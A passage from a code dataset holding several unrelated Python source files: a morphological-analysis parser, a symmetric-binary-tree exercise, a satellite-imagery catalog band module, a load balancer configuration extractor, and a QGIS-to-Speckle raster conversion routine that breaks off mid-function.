fixing {sport}>s>>men> would make {sport}>s>{men},\n # which violates the ELP coding, which requires that affixes\n # be completely outside all roots.\n if suffixes and any(suffix in BAD_SUFFIXES for suffix in suffixes):\n return True\n\n return False\n\n\ndef parse_analysis(analysis):\n \"\"\"Parse a morphological analyses into lists of morphs.\"\"\"\n # Parse out prefixes, roots, and suffixes. 
Roots will not be None,\n # but prefixes and suffixes might be.\n try:\n prefixes, roots, suffixes = ANALYSIS_RE.match(analysis).groups()\n except AttributeError:\n # No match\n raise AnalysisParseError(\"Could not match analysis {} to regex\".format(analysis))\n\n prefixes = ([item for item in SEP_RE.split(prefixes) if item]\n if prefixes else None)\n suffixes = ([item for item in SEP_RE.split(suffixes) if item]\n if suffixes else None)\n roots = [item.replace(MISANALYSIS_MARKER, '')\n for item in SEP_RE.split(roots) if item]\n\n # Correct analyses as needed\n if suffixes:\n roots, suffixes = _correct_suffixes(roots, suffixes)\n\n # Throw out ones we just cannot handle\n if _exclude_analysis(prefixes, roots, suffixes):\n raise AnalysisParseError(\"Analysis {} meets exclusion criteria\".format(analysis))\n\n return (prefixes, roots, suffixes)\n\n\ndef format_analysis(prefixes, roots, suffixes):\n \"\"\"Format an analysis in the ELP convention.\"\"\"\n prefix_str = (\"\".join(\"<{}<\".format(prefix) for prefix in prefixes) if prefixes else\n \"\")\n root_str = \"\".join(\"{{{}}}\".format(root) for root in roots)\n suffix_str = (\"\".join(\">{}>\".format(suffix) for suffix in suffixes) if suffixes else\n \"\")\n return \"\".join((prefix_str, root_str, suffix_str))\n\n\ndef morph_map(in_file):\n \"\"\"Return dicts of the relationships between morphs in in_file.\"\"\"\n prefix_words = defaultdict(set)\n root_words = defaultdict(set)\n suffix_words = defaultdict(set)\n\n for line in in_file:\n word, analysis = line.strip().split(',')\n try:\n prefixes, roots, suffixes = parse_analysis(analysis)\n except AnalysisParseError:\n # Skip forms we can't analyze\n continue\n\n # Skip compounds\n root = roots[0]\n if len(roots) > 1:\n continue\n\n # Store each morph\n root_words[root].add(word)\n for affixes, affix_words in ((prefixes, prefix_words), (suffixes, suffix_words)):\n if affixes:\n for affix in affixes:\n affix_words[affix].add(word)\n else:\n 
affix_words[NULL_AFFIX].add(word)\n\n return (prefix_words, root_words, suffix_words)\n","sub_path":"elp.py","file_name":"elp.py","file_ext":"py","file_size_in_byte":14540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471081849","text":"from utils_py.tree import *\n\nclass Solution:\n def is_sym(self, l: TreeNode, r: TreeNode):\n if not l and not r:\n return True\n if not l or not r:\n return False\n\n if l.val != r.val:\n return False\n return self.is_sym(l.right, r.left) and self.is_sym(l.left, r.right)\n\n def isSymmetric(self, root: TreeNode) -> bool:\n if not root:\n return True\n return self.is_sym(root.left, root.right)\n\ndef test(test_name, root, expected):\n res = Solution().isSymmetric(root)\n if res == expected:\n print(test_name + ' success.')\n else:\n print(test_name + ' failed.')\n\n\nif __name__ == \"__main__\":\n #     1\n #    / \\\n #   2   2\n #  / \\ / \\\n # 3  4 4  3\n root1 = TreeNode(1)\n root1.left = TreeNode(2)\n root1.right = TreeNode(2)\n root1.left.left = TreeNode(3)\n root1.left.right = TreeNode(4)\n root1.right.left = TreeNode(4)\n root1.right.right = TreeNode(3)\n expected1 = True\n test('test1', root1, expected1)\n\n #     1\n #    / \\\n #   2   2\n #  / \\ / \\\n #  3  3\n root2 = TreeNode(1)\n root2.left = TreeNode(2)\n root2.right = TreeNode(2)\n root2.left.right = TreeNode(3)\n root2.right.right = TreeNode(3)\n expected2 = False\n test('test2', root2, expected2)\n\n root3 = None\n expected3 = True\n test('test3', root3, expected3)\n","sub_path":"of28_对称的二叉树/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57755411","text":"from enum import Enum\n\nfrom descarteslabs.common.property_filtering import GenericProperties\nfrom .catalog_base import CatalogObject\nfrom .named_catalog_base import NamedCatalogObject\nfrom .attributes import 
Attribute, EnumAttribute, Resolution\n\n\nproperties = GenericProperties()\n\n\nclass DataType(str, Enum):\n \"\"\"Valid data types for bands.\n\n Attributes\n ----------\n BYTE : enum\n An 8 bit unsigned integer value.\n UINT16 : enum\n A 16 bit unsigned integer value.\n INT16 : enum\n A 16 bit signed integer value.\n UINT32 : enum\n A 32 bit unsigned integer value.\n INT32 : enum\n A 32 bit signed integer value.\n FLOAT32 : enum\n A 32 bit single-precision floating-point format value.\n FLOAT64 : enum\n A 64 bit double-precision floating-point format value.\n \"\"\"\n\n BYTE = \"Byte\"\n UINT16 = \"UInt16\"\n INT16 = \"Int16\"\n UINT32 = \"UInt32\"\n INT32 = \"Int32\"\n FLOAT32 = \"Float32\"\n FLOAT64 = \"Float64\"\n\n\nclass BandType(str, Enum):\n \"\"\"Types of bands with different data interpretation.\n\n The type of band is represented in the specific Band class being used\n and is only for informative purposes.\n\n Attributes\n ----------\n CLASS : enum\n A band that maps a finite set of values that may not be continuous.\n SPECTRAL : enum\n A band that lies somewhere on the visible/NIR/SWIR electro-optical wavelength\n spectrum.\n MASK : enum\n A binary band where by convention a 0 means masked and 1 means non-masked.\n MICROWAVE : enum\n A band that lies in the microwave spectrum, often from SAR or passive radar\n sensors.\n GENERIC : enum\n An unspecified kind of band not fitting any other type.\n \"\"\"\n\n CLASS = \"class\"\n SPECTRAL = \"spectral\"\n MASK = \"mask\"\n MICROWAVE = \"microwave\"\n GENERIC = \"generic\"\n\n\nclass Band(NamedCatalogObject):\n \"\"\"A data band in images of a specific product.\n\n This is an abstract class that cannot be instantiated, but can be used for searching\n across all types of bands. The concrete bands are represented by the derived\n classes. 
To create a new band instantiate one of those specialized classes:\n\n * `SpectralBand`: A band that lies somewhere on the visible/NIR/SWIR electro-optical\n wavelength spectrum. Specific attributes:\n :attr:`~SpectralBand.wavelength_nm_center`,\n :attr:`~SpectralBand.wavelength_nm_min`,\n :attr:`~SpectralBand.wavelength_nm_max`,\n :attr:`~SpectralBand.wavelength_nm_fwhm`\n * `MicrowaveBand`: A band that lies in the microwave spectrum, often from SAR or\n passive radar sensors. Specific attributes: :attr:`~MicrowaveBand.frequency`,\n :attr:`~MicrowaveBand.bandwidth`\n * `MaskBand`: A binary band where by convention a 0 means masked and 1 means\n non-masked. The :attr:`~Band.data_range` and :attr:`~Band.display_range` for\n masks is implicitly ``[0, 1]``.\n * `ClassBand`: A band that maps a finite set of values that may not be continuous to\n classification categories (e.g. a land use classification). A visualization with\n straight pixel values is typically not useful, so commonly a\n :attr:`~ClassBand.colormap` is used. Specific attributes:\n :attr:`~ClassBand.colormap`, :attr:`~ClassBand.colormap_name`,\n :attr:`~ClassBand.class_labels`\n * `GenericBand`: A generic type for bands that are not represented by the other band\n types, e.g., mapping physical values like temperature or angles. 
Specific\n attributes: :attr:`~GenericBand.colormap`, :attr:`~GenericBand.colormap_name`,\n :attr:`~GenericBand.physical_range`, :attr:`~GenericBand.physical_range_unit`\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n **The attributes documented below are shared by all band objects,\n namely SpectralBand, MicrowaveBand, MaskBand, ClassBand, and GenericBand.**\n\n Attributes\n ----------\n description : str\n A description with further details on the band\n type : str, BandType\n The type of this band, directly corresponding to a `Band` subclass\n (:py:class:`SpectralBand`, :py:class:`MicrowaveBand`, :py:class:`MaskBand`,\n :py:class:`ClassBand`, :py:class:`GenericBand`). Never needs to be set\n explicitly, this attribute is implied by the subclass used. The type of a\n band does not necessarily affect how it is rastered, it mainly conveys\n useful information about the data it contains.\n *Filterable*.\n sort_order : int\n A number defining the default sort order for bands within a product. 
If not\n set for newly created bands, this will default to the current maximum sort\n order + 1 in the product.\n *Sortable*.\n data_type : DataType\n Required: The data type for pixel values in this band\n nodata : float\n A value representing missing data in a pixel in this band\n data_range : tuple(float, float)\n Required: The minimum and maximum pixel values stored in this band\n display_range : tuple(float, float)\n Required: A reasonable default range of pixel values when rastering\n this band for display purposes\n resolution : Resolution\n The spatial resolution of this band.\n *Filterable, sortable*.\n band_index : int\n Required: The 0-based index into the source data to access this band\n file_index : int\n The 0-based index into the list of source files, if there are multiple ones.\n Defaults to 0 (first file).\n jpx_layer_index : int\n The 0-based layer index if the source data is JPEG2000 with layers.\n Defaults to 0.\n \"\"\"\n\n _doc_type = \"band\"\n _url = \"/bands\"\n _derived_type_switch = \"type\"\n _default_includes = [\"product\"]\n\n description = Attribute()\n type = EnumAttribute(BandType)\n sort_order = Attribute()\n data_type = EnumAttribute(DataType)\n nodata = Attribute()\n data_range = Attribute()\n display_range = Attribute()\n resolution = Resolution()\n band_index = Attribute()\n file_index = Attribute()\n jpx_layer_index = Attribute()\n\n def __new__(cls, *args, **kwargs):\n if cls is Band:\n raise TypeError(\n \"Please instantiate one of the derived classes of 'Band' instead\"\n )\n\n return super(Band, cls).__new__(cls)\n\n def __init__(self, **kwargs):\n if self._derived_type_switch not in kwargs:\n kwargs[self._derived_type_switch] = self._derived_type\n\n super(Band, self).__init__(**kwargs)\n\n @classmethod\n def search(cls, client=None):\n \"\"\"A search query for all bands.\n\n Returns an instance of the\n :py:class:`~descarteslabs.catalog.search.Search` class configured for\n searching bands. 
Call this on the :py:class:`Band` base class to search all\n types of bands or classes :py:class:`SpectralBand`, :py:class:`MicrowaveBand`,\n :py:class:`MaskBand`, :py:class:`ClassBand` and :py:class:`GenericBand` to search\n only a specific type of band.\n\n\n Parameters\n ----------\n client : :py:class:`CatalogClient`\n A `CatalogClient` instance to use for requests to the Descartes Labs\n catalog.\n\n Returns\n -------\n :py:class:`~descarteslabs.catalog.search.Search`\n An instance of the :py:class:`~descarteslabs.catalog.search.Search` class\n \"\"\"\n search = super(Band, cls).search(client)\n if cls._derived_type:\n search = search.filter(properties.type == cls._derived_type)\n return search\n\n\nclass SpectralBand(Band):\n \"\"\"A band that lies somewhere on the visible/NIR/SWIR electro-optical wavelength\n spectrum.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n wavelength_nm_center : float\n Weighted center of min/max responsiveness of the band, in nm.\n *Filterable, sortable*.\n wavelength_nm_min : float\n Minimum wavelength this band is sensitive to, in nm.\n *Filterable, sortable*.\n wavelength_nm_max : float\n Maximum wavelength this band is sensitive to, in nm.\n *Filterable, sortable*.\n wavelength_nm_fwhm : float\n Full width at half maximum value of the wavelength spread, in nm.\n *Filterable, sortable*.\n \"\"\"\n\n _derived_type = BandType.SPECTRAL.value\n\n wavelength_nm_center = 
Attribute()\n wavelength_nm_min = Attribute()\n wavelength_nm_max = Attribute()\n wavelength_nm_fwhm = Attribute()\n\n\nclass MicrowaveBand(Band):\n \"\"\"A band that lies in the microwave spectrum, often from SAR or passive radar sensors.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n frequency : float\n Center frequency of the observed microwave in GHz.\n *Filterable, sortable*.\n bandwidth : float\n Chirp bandwidth of the sensor in MHz.\n *Filterable, sortable*.\n \"\"\"\n\n _derived_type = BandType.MICROWAVE.value\n\n frequency = Attribute()\n bandwidth = Attribute()\n\n\nclass MaskBand(Band):\n \"\"\"A binary band where by convention a 0 means masked and 1 means non-masked.\n\n The :py:attr:`data_range` and :py:attr:`display_range` for masks is implicitly\n ``(0, 1)``.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), and\n the computed attributes (`data_range`, `display_range`) any (inherited)\n attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n 
Attributes\n ----------\n data_range : tuple(float, float)\n Readonly: [0, 1].\n display_range : tuple(float, float)\n Readonly: [0, 1].\n \"\"\"\n\n _derived_type = BandType.MASK.value\n\n\nclass ClassBand(Band):\n \"\"\"A band that maps a finite set of values that may not be continuous.\n\n For example land use classification. A visualization with straight pixel values\n is typically not useful, so commonly a colormap is used.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n colormap_name : str\n Name of a predefined colormap for display purposes.\n colormap : list(tuple)\n A custom colormap for this band. A list of lists, where each nested list\n is a 4-tuple of RGBA values to map pixels whose value is the index of the\n tuple. E.g. the colormap ``[[100, 20, 200, 255]]`` would map pixels\n whose value is 0 in the original band to the RGBA color defined by\n ``[100, 20, 200, 255]``. The number of 4-tuples provided can be up\n to the maximum of this band's data range. Omitted values will map to black\n by default.\n class_labels : list(str or None)\n A list of labels where each element is a name for the class with the value at\n that index. 
Elements can be null if there is no label at that value.\n \"\"\"\n\n _derived_type = BandType.CLASS.value\n\n colormap_name = Attribute()\n colormap = Attribute()\n class_labels = Attribute()\n\n\nclass GenericBand(Band):\n \"\"\"A generic kind of band not fitting any other type.\n\n For example mapping physical values like temperature or angles.\n\n Parameters\n ----------\n kwargs : dict\n With the exception of readonly attributes\n (:py:attr:`~descarteslabs.catalog.CatalogObject.created`,\n :py:attr:`~descarteslabs.catalog.CatalogObject.modified`), any\n (inherited) attribute listed below can also be used as a keyword argument.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base classes:\n\n * :py:class:`descarteslabs.catalog.Band`\n * :py:class:`descarteslabs.catalog.NamedCatalogObject`\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n physical_range : tuple(float, float)\n A physical range that pixel values map to\n physical_range_unit : str\n Unit of the physical range\n colormap_name : str\n Name of a predefined colormap for display purposes\n colormap : list(tuple)\n A custom colormap for this band. A list of lists, where each nested list\n is a 4-tuple of RGBA values to map pixels whose value is the index of the\n tuple. E.g. the colormap ``[[100, 20, 200, 255]]`` would map pixels\n whose value is 0 in the original band to the RGBA color defined by\n ``[100, 20, 200, 255]``. The number of 4-tuples provided can be up\n to the maximum of this band's data range. Omitted values will map to black\n by default.\n \"\"\"\n\n _derived_type = BandType.GENERIC.value\n\n physical_range = Attribute()\n physical_range_unit = Attribute()\n colormap_name = Attribute()\n colormap = Attribute()\n\n\nclass DerivedBand(CatalogObject):\n \"\"\"\n A type of band that is the result of a pixel function applied to one or more\n existing bands. 
This object type only supports read operations;\n they cannot be created, updated, or deleted using this client.\n\n Parameters\n ----------\n kwargs : dict\n This is a readonly object.\n\n Inheritance\n -----------\n For inherited parameters, methods, attributes, and properties, please refer to the\n base class:\n\n * :py:class:`descarteslabs.catalog.CatalogObject`\n\n |\n\n Attributes\n ----------\n name : str\n Required, immutable: The name of the derived band, globally unique.\n *Filterable, sortable*.\n description : str\n Immutable: A description with further details on the derived band\n data_type : str\n Required, immutable: The data type for pixel values in this derived band\n data_range : tuple(float, float)\n Required, immutable: The minimum and maximum pixel values stored in\n this derived band\n physical_range : tuple(float, float)\n Immutable: A physical range that pixel values map to\n bands : list(str)\n Required, immutable: List of bands used in the derived band pixel function\n *Filterable*\n function_name : str\n Required, immutable: Name of the function applied to create this derived band\n\n Methods\n -------\n delete(ignore_missing=False)\n You cannot delete a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not supported for DerivedBands.\n\n \"\"\"\n\n _doc_type = \"derived_band\"\n _url = \"/derived_bands\"\n\n name = Attribute()\n description = Attribute()\n data_type = EnumAttribute(DataType)\n data_range = Attribute()\n physical_range = Attribute()\n bands = Attribute()\n function_name = Attribute()\n\n def save(self):\n \"\"\"You cannot save a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not supported for DerivedBands.\n \"\"\"\n raise NotImplementedError(\"Saving and updating DerivedBands is not permitted\")\n\n @classmethod\n def delete(cls, id, client=None, ignore_missing=False):\n \"\"\"You cannot delete a derived band.\n\n Raises\n ------\n NotImplementedError\n This method is not 
supported for DerivedBands.\n \"\"\"\n raise NotImplementedError(\"Deleting DerivedBands is not permitted\")\n\n def _instance_delete(self, ignore_missing=False):\n raise NotImplementedError(\"Deleting DerivedBands is not permitted\")\n","sub_path":"descarteslabs/catalog/band.py","file_name":"band.py","file_ext":"py","file_size_in_byte":18049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97360735","text":"# coding: utf-8\n#==============================================================================\n#\n# Limited error checking, no optimisation, blunt force approach\n# to get basic information extracted from load balancer configuration\n# Searching based on a particular configuration style\n# \n# python loadbalancer.py loadbalancer IP port\n# assumes 'loadbalancer.txt' is in same path/directory\n#\n#==============================================================================\n\nimport sys\nimport re\n\nfrom ciscoconfparse import CiscoConfParse\n\ndevice = sys.argv[1]+'.txt'\nparse = CiscoConfParse(device)\n\n\ndef prConf(config_string):\n\n for x in range(len(config_string)):\n print(config_string[x])\n\n\ndef VIP_local(VIP_IP, VIP_TCP, VIP_Protocol, last_VIP):\n\n sticky_all = []\n sticky_timeout = ''\n\n class_map = parse.find_parents_w_child('^class-map', VIP_IP + VIP_Protocol + VIP_TCP + '$')\n transition = re.split(r'\\s+', class_map[0])\n class_map_name = transition[-1]\n class_map_all = parse.find_all_children(class_map[0])\n\n policy_map_class = parse.find_parents_w_child('class ' + class_map_name, 'loadbalance policy')\n policy_map_class_all = parse.find_children('class ' + class_map_name)\n if policy_map_class == []:\n return\n policy_map_class_policy = parse.find_children_w_parents('^' + policy_map_class[0], '\\s+loadbalance policy')\n transition = re.split(r'\\s+', policy_map_class_policy[0])\n policy_map_name = transition[-1]\n policy_map_all = parse.find_all_children('match ' + 
policy_map_name)\n\n nat = parse.find_children_w_parents('^'+policy_map_class[0], '\\s+nat dynamic')\n if nat != []:\n transition = re.split(r'\\s+', nat[0])\n nat = parse.find_lines('nat-pool ' + transition[3])\n nat_interface = parse.find_parents_w_child('interface ', 'nat-pool ' + transition[3])\n\n policy_map = parse.find_lines('policy-map type loadbalance first-match ' + policy_map_name)\n serverfarm_ = parse.find_children_w_parents('^' + policy_map[0], 'serverfarm ')\n transition = re.split(r'\\s+', serverfarm_[-1])\n serverfarm_name = transition[-1]\n\n if parse.find_lines('farm .* ' + serverfarm_name):\n sticky_name = ''\n serverfarm_all = parse.find_all_children('farm .* ' + serverfarm_name)\n elif not parse.find_lines('farm .* ' + serverfarm_name):\n sticky_name = serverfarm_name\n sticky_all = parse.find_all_children('^sticky .*' + sticky_name + '$')\n serverfarm_name = parse.find_children_w_parents(sticky_name + '$', ' serverfarm')\n if serverfarm_name != []:\n transition = re.split(r'\\s+', serverfarm_name[-1])\n serverfarm_name = transition[-1]\n serverfarm_all = parse.find_all_children('farm .* ' + serverfarm_name)\n sticky_timeout = parse.find_children_w_parents(sticky_name + '$', '\\s+timeout ')\n if sticky_timeout != [] :\n transition = re.split(r'\\s+', sticky_timeout[-1])\n sticky_timeout = transition[-1]\n else:\n serverfarm_name = 'none'\n serverfarm_all = []\n\n if last_VIP != class_map_name:\n print(' ')\n print('------------------------------------------------------------')\n print('---- ' + class_map_name)\n print('------------------------------------------------------------')\n print(' ')\n\n transition = parse.find_children_w_parents('host ' + serverfarm_name + '$', '\\sprobe\\s')\n # the next line removes duplicates\n probes = list(set(transition))\n if last_VIP != class_map_name:\n for probe in probes:\n transition = re.split(r'\\s+', probe)\n probe_name = transition[2]\n probe_all = parse.find_all_children('^probe .* ' + probe_name + 
'$')\n prConf(probe_all)\n print(' ')\n\n for rserver in parse.find_children_w_parents('farm .* ' + serverfarm_name + '$', ' rserver '):\n transition = re.split(r'\\s+', rserver)\n rserver_name = transition[2]\n rserver_all = parse.find_all_children('rserver .* ' + rserver_name)\n prConf(rserver_all)\n\n if last_VIP != class_map_name:\n print(' ')\n prConf(serverfarm_all)\n print(' ')\n prConf(sticky_all)\n if sticky_all:\n print(' ')\n prConf(class_map_all)\n print(' ')\n prConf(policy_map_all)\n print(' ')\n print('policy-map multi-match LB-HTTP-POLICY')\n prConf(policy_map_class_all)\n if nat != []:\n print(' ')\n prConf(nat_interface)\n prConf(nat)\n print(' ')\n\n return class_map_name\n\n\ndef main():\n\n #============================================================\n # python loadbalancer.py loadbalancer IP PORT\n # assumes 'loadbalancer.txt' is in same path/directory\n #============================================================\n\n last_VIP = ''\n\n x_IP = sys.argv[2]\n x_TCP = sys.argv[3]\n\n for x in parse.find_lines(r'virtual-address'):\n transition = re.split(r'\\s+', x)\n t_IP = transition[4]\n t_TCP = transition[-1]\n t_Protocol = transition[5]\n\n if x_IP == t_IP:\n if x_TCP == t_TCP:\n if t_Protocol == t_TCP:\n x_Protocol = ' '\n else:\n x_Protocol = ' ' + transition[5] + ' ' + transition[6] + ' '\n last_VIP = VIP_local(x_IP, x_TCP, x_Protocol, last_VIP)\n#\n#==========================================================================\n#\nif __name__ == '__main__':\n main()\n#\n#==========================================================================\n","sub_path":"farms.py","file_name":"farms.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271127409","text":"from distutils.log import error\nfrom qgis._core import QgsCoordinateTransform, Qgis, QgsPointXY, QgsGeometry, QgsRasterBandStats, QgsFeature, QgsFields, \\\n QgsField\nfrom specklepy.objects 
import Base\n\nfrom speckle.converter import geometry\nfrom speckle.converter.geometry import convertToSpeckle, transform\nfrom speckle.converter.geometry.mesh import rasterToMesh\nfrom speckle.logging import logger\nfrom osgeo import ( # # C:\\Program Files\\QGIS 3.20.2\\apps\\Python39\\Lib\\site-packages\\osgeo\n gdal, osr)\n\ndef featureToSpeckle(fieldnames, f, sourceCRS, targetCRS, project, selectedLayer):\n b = Base()\n\n #apply transformation if needed\n if sourceCRS != targetCRS:\n xform = QgsCoordinateTransform(sourceCRS, targetCRS, project)\n geometry = f.geometry()\n geometry.transform(xform)\n f.setGeometry(geometry)\n\n # Try to extract geometry\n try:\n geom = convertToSpeckle(f, selectedLayer)\n #print(geom)\n if geom is not None:\n b[\"geometry\"] = geom\n except Exception as error:\n logger.logToUser(\"Error converting geometry: \" + str(error), Qgis.Critical)\n\n for name in fieldnames:\n corrected = name.replace(\"/\", \"_\").replace(\".\", \"-\")\n if corrected == \"id\":\n corrected == \"applicationId\"\n b[corrected] = str(f[name])\n return b\n\n\ndef rasterFeatureToSpeckle(selectedLayer, projectCRS, project):\n rasterBandCount = selectedLayer.bandCount()\n rasterBandNames = []\n rasterDimensions = [selectedLayer.width(), selectedLayer.height()]\n if rasterDimensions[0]*rasterDimensions[1] > 1000000 :\n logger.logToUser(\"Large layer: \", Qgis.Warning)\n\n ds = gdal.Open(selectedLayer.source(), gdal.GA_ReadOnly)\n rasterOriginPoint = QgsPointXY(ds.GetGeoTransform()[0], ds.GetGeoTransform()[3])\n rasterResXY = [ds.GetGeoTransform()[1],ds.GetGeoTransform()[5]]\n rasterBandNoDataVal = []\n rasterBandMinVal = []\n rasterBandMaxVal = []\n rasterBandVals = []\n\n b = Base()\n # Try to extract geometry\n reprojectedPt = QgsGeometry.fromPointXY(QgsPointXY())\n try:\n reprojectedPt = rasterOriginPoint\n if selectedLayer.crs()!= projectCRS: reprojectedPt = transform.transform(rasterOriginPoint, selectedLayer.crs(), projectCRS)\n pt = 
QgsGeometry.fromPointXY(reprojectedPt)\n geom = convertToSpeckle(pt, selectedLayer)\n if (geom != None):\n b['displayValue'] = [geom]\n except Exception as error:\n logger.logToUser(\"Error converting point geometry: \" + str(error), Qgis.Critical)\n\n for index in range(rasterBandCount):\n rasterBandNames.append(selectedLayer.bandName(index+1))\n rb = ds.GetRasterBand(index+1)\n valMin = selectedLayer.dataProvider().bandStatistics(index+1, QgsRasterBandStats.All).minimumValue\n valMax = selectedLayer.dataProvider().bandStatistics(index+1, QgsRasterBandStats.All).maximumValue\n bandVals = rb.ReadAsArray().tolist()\n\n '''\n ## reduce resolution if needed: \n if totalValues>max_values : \n bandVals_resized = [] #list of lists\n factor = 1 #recalculate factor to reach max size\n for i in range(1,20):\n if totalValues/(i*i) <= max_values:\n factor = i\n break\n for item in bandVals: #reduce each row and each column\n bandVals_resized = [bandVals]\n '''\n bandValsFlat = []\n [bandValsFlat.extend(item) for item in bandVals]\n #look at mesh chunking\n b[\"@(10000)\" + selectedLayer.bandName(index+1) + \"_values\"] = bandValsFlat #[0:int(max_values/rasterBandCount)]\n rasterBandVals.append(bandValsFlat)\n rasterBandNoDataVal.append(rb.GetNoDataValue())\n rasterBandMinVal.append(valMin)\n rasterBandMaxVal.append(valMax)\n\n b[\"X resolution\"] = rasterResXY[0]\n b[\"Y resolution\"] = rasterResXY[1]\n b[\"X pixels\"] = rasterDimensions[0]\n b[\"Y pixels\"] = rasterDimensions[1]\n b[\"Band count\"] = rasterBandCount\n b[\"Band names\"] = rasterBandNames\n\n # creating a mesh\n vertices = []\n faces = []\n colors = []\n count = 0\n rendererType = selectedLayer.renderer().type()\n #print(rendererType)\n # TODO identify symbology type and if Multiband, which band is which color\n for v in range(rasterDimensions[1] ): #each row, Y\n for h in range(rasterDimensions[0] ): #item in a row, X\n pt1 = QgsPointXY(rasterOriginPoint.x()+h*rasterResXY[0], 
rasterOriginPoint.y()+v*rasterResXY[1])\n pt2 = QgsPointXY(rasterOriginPoint.x()+h*rasterResXY[0], rasterOriginPoint.y()+(v+1)*rasterResXY[1])\n pt3 = QgsPointXY(rasterOriginPoint.x()+(h+1)*rasterResXY[0], rasterOriginPoint.y()+(v+1)*rasterResXY[1])\n pt4 = QgsPointXY(rasterOriginPoint.x()+(h+1)*rasterResXY[0], rasterOriginPoint.y()+v*rasterResXY[1])\n # first, get point coordinates with correct position and resolution, then reproject each:\n if selectedLayer.crs()!= projectCRS:\n pt1 = transform.transform(src = pt1, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt2 = transform.transform(src = pt2, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt3 = transform.transform(src = pt3, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n pt4 = transform.transform(src = pt4, crsSrc = selectedLayer.crs(), crsDest = projectCRS)\n vertices.extend([pt1.x(), pt1.y(), 0, pt2.x(), pt2.y(), 0, pt3.x(), pt3.y(), 0, pt4.x(), pt4.y(), 0]) ## add 4 points\n faces.extend([4, count, count+1, count+2, count+3])\n\n # color vertices according to QGIS renderer\n color = (0<<16) + (0<<8) + 0\n noValColor = selectedLayer.renderer().nodataColor().getRgb()\n\n if rendererType == \"multibandcolor\":\n redBand = selectedLayer.renderer().redBand()\n greenBand = selectedLayer.renderer().greenBand()\n blueBand = selectedLayer.renderer().blueBand()\n rVal = 0\n gVal = 0\n bVal = 0\n for k in range(rasterBandCount):\n #### REMAP band values to (0,255) range\n valRange = (rasterBandMaxVal[k] - rasterBandMinVal[k])\n colorVal = int( (rasterBandVals[k][int(count/4)] - rasterBandMinVal[k]) / valRange * 255 )\n if k+1 == redBand: rVal = colorVal\n if k+1 == greenBand: gVal = colorVal\n if k+1 == blueBand: bVal = colorVal\n color = (rVal<<16) + (gVal<<8) + bVal\n # for missing values (check by 1st band)\n if rasterBandVals[0][int(count/4)] != rasterBandVals[0][int(count/4)]:\n color = (noValColor[0]<<16) + (noValColor[1]<<8) + noValColor[2]\n\n elif rendererType == \"paletted\":\n 
